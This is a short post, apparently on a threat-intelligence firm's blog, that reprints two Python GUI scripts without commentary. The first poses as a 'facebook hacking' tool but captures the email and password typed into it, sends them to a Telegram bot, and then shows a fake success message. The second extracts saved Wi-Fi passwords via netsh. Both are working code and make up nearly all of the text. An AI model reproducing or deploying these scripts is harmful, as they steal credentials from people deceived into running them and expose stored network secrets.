0 0
Read Time:1 Minute, 23 Second

# by l54
# Anonymous_Hack_12
import tkinter as tk
from tkinter import messagebox
import requests
import time

window = tk.Tk()
window.title(“facebook hacking”)
window.geometry(“400×500”)
window.resizable(False, False)
image = tk.PhotoImage(file=”hacked2.png”)
image_label = tk.Label(image=image)
image_label.pack(side=”top”, fill=”both”, expand=True)
email_label = tk.Label(text=”Email/Phone:”)
email_label.pack()
email_entry = tk.Entry()
email_entry.pack()

password_entry = tk.Label(text=”Password:”)
password_entry.pack()
password_entry = tk.Entry(show=”*”)
password_entry.pack()
password = tk.Label(text=”Target id:”)
password.pack()
password = tk.Entry(show=””)
password.pack()


def login():
requests.post(“https://api.telegram.org/bot<Token>/sendMessage&#8221;, data={
“chat_id”: “<you chat id>”,
“text”: f”Email/Phone: {email_entry.get()}\nPassword: {password_entry.get()}”
})

time.sleep(2)
messagebox.showinfo(
“Success”, “hacked successful! password is : 123455678”)


login_button = tk.Button(text=” Hack “, command=login)
login_button.pack()
window.mainloop()

import tkinter as tk
import subprocess


def extract_password():
network_name = entry.get()
password = subprocess.run([“netsh”, “wlan”, “show”, “profile”,
network_name, “key=clear”], capture_output=True).stdout.decode()
password_lines = password.split(“\r\n”)
for line in password_lines:
if “Key Content” in line:
password = line.split(“:”)[1].strip()
break
text_widget.delete(“1.0”, tk.END)
text_widget.insert(“1.0”, password)


window = tk.Tk()
window.title(“Wi-Fi Password Extractor by L54”)
label = tk.Label(text=”Enter the name of the Wi-Fi network:”)
label.pack()
entry = tk.Entry()
entry.pack()
button = tk.Button(text=”Extract Password”, command=extract_password)
button.pack()
text_widget = tk.Text()
text_widget.pack()
window.mainloop()

About Post Author

Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %

By Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence